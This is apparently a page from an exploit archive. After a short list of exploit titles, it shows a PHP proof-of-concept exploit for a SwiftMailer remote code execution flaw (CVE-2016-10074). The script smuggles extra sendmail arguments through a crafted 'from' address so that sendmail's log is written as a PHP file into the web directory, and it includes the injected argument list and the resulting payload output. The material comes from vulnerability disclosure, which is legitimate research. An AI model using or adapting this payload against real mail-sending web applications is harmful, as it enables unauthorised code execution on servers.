f8746c89a4
4 new exploits analogx SimpleServer:WWW 1.0.6 - Directory Traversal AnalogX SimpleServer:WWW 1.0.6 - Directory Traversal My PHP Dating - 'success_story.php id' SQL Injection My PHP Dating - 'id' Parameter SQL Injection Roundcube 0.3.1 - Cross-Site Request Forgery / SQL Injection Roundcube Webmail 0.3.1 - Cross-Site Request Forgery / SQL Injection Roundcube 1.1.3 - Directory Traversal Roundcube Webmail 1.1.3 - Directory Traversal PHPMailer 5.2.17 - Remote Code Execution PHPMailer < 5.2.18 - Remote Code Execution (Bash) PHPMailer < 5.2.18 - Remote Code Execution (PHP) PHPMailer < 5.2.20 - Remote Code Execution WordPress Plugin Simply Poll 1.4.1 - SQL Injection SwiftMailer < 5.4.5-DEV - Remote Code Execution
78 lines
2 KiB
PHP
Executable file
78 lines
2 KiB
PHP
Executable file
<?php
|
|
|
|
/*
|
|
|
|
SwiftMailer <= 5.4.5-DEV Remote Code Execution (CVE-2016-10074)
|
|
|
|
Discovered/Coded by:
|
|
|
|
Dawid Golunski
|
|
https://legalhackers.com
|
|
|
|
Full Advisory URL:
|
|
https://legalhackers.com/advisories/SwiftMailer-Exploit-Remote-Code-Exec-CVE-2016-10074-Vuln.html
|
|
|
|
Exploit code URL:
|
|
https://legalhackers.com/exploits/CVE-2016-10074/SwiftMailer_PoC_RCE_Exploit.txt
|
|
|
|
Follow the feed for updates:
|
|
|
|
https://twitter.com/dawid_golunski
|
|
|
|
|
|
A simple PoC (working on Sendmail MTA)
|
|
|
|
It will inject the following parameters to sendmail command:
|
|
|
|
Arg no. 0 == [/usr/sbin/sendmail]
|
|
Arg no. 1 == [-t]
|
|
Arg no. 2 == [-i]
|
|
Arg no. 3 == [-fattacker\]
|
|
Arg no. 4 == [-oQ/tmp/]
|
|
Arg no. 5 == [-X/var/www/cache/phpcode.php]
|
|
Arg no. 6 == ["@email.com]
|
|
|
|
|
|
which will write the transfer log (-X) into /var/www/cache/phpcode.php file.
|
|
Note /var/www/cache must be writable by www-data web user.
|
|
|
|
The resulting file will contain the payload passed in the body of the msg:
|
|
|
|
09607 <<< Content-Type: text/html; charset=us-ascii
|
|
09607 <<<
|
|
09607 <<< <?php phpinfo(); ?>
|
|
09607 <<<
|
|
09607 <<<
|
|
09607 <<<
|
|
|
|
|
|
See the full advisory URL for the exploit details.
|
|
|
|
*/
|
|
|
|
|
|
// Attacker's input coming from untrusted source such as $_GET , $_POST etc.
|
|
// For example from a Contact form with sender field
|
|
|
|
$email_from = '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php "@email.com';
|
|
|
|
// ------------------
|
|
|
|
// mail() param injection via the vulnerability in SwiftMailer
|
|
|
|
require_once 'lib/swift_required.php';
|
|
// Mail transport
|
|
$transport = Swift_MailTransport::newInstance();
|
|
// Create the Mailer using your created Transport
|
|
$mailer = Swift_Mailer::newInstance($transport);
|
|
|
|
// Create a message
|
|
$message = Swift_Message::newInstance('Swift PoC exploit')
|
|
->setFrom(array($email_from => 'PoC Exploit Payload'))
|
|
->setTo(array('receiver@domain.org', 'other@domain.org' => 'A name'))
|
|
->setBody('Here is the message itself')
|
|
;
|
|
// Send the message with PoC payload in 'from' field
|
|
$result = $mailer->send($message);
|
|
|
|
?>
|